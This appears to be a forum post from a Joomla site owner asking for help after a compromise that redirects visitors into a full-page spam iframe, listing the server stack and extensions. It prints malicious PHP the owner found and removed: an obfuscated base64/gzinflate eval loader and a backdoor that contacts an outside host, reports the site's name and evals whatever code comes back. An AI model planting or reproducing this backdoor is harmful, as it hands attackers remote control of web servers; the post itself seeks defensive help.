What is happening is certain content on the site sends the user to a completely different Spammer site, within an iframe. 100% width 100% height.
The iframe code is not simply sitting in some file, we have search all over for it...
More Information:
Joomla! 1.0.13 Stable (just upgraded to Joomla! 1.15 while trying to fix it)
Apache, PHP 4.4.7
MySQL 4.1.19
Host: Rackspace
3rd party extensions:
FireBoard 1.0.4
Community Builder: 1.1
Feed2post: 1.5
seyret: 0.2.7.8
Phil-A-Form v1.6.7
Backup: yes 1 week ago. But the hacker may have been tampering before then.
permissions: Folder permissions may have been tampered with. The hacker definately has some passwords
Additional Information:
We found and removed some code, that included a link to:
km20725. keymachine. de
keymachine .de
as well as some code that looks like this:
Code: Select all
eval(gzinflate(base64_decode('FZzHjqRaFkU/p9...............3//+Hw==')));
Code: Select all
if(isset($_GET['go'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/server1/index.php?host='.$_SERVER['SERVER_NAME'].'&go='.$_GET['go'].' HTTP/1.0'."\r\n");
fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
fclose ($sock);}
}
Any help or information would be GREATLY appreciated!!!!!!!!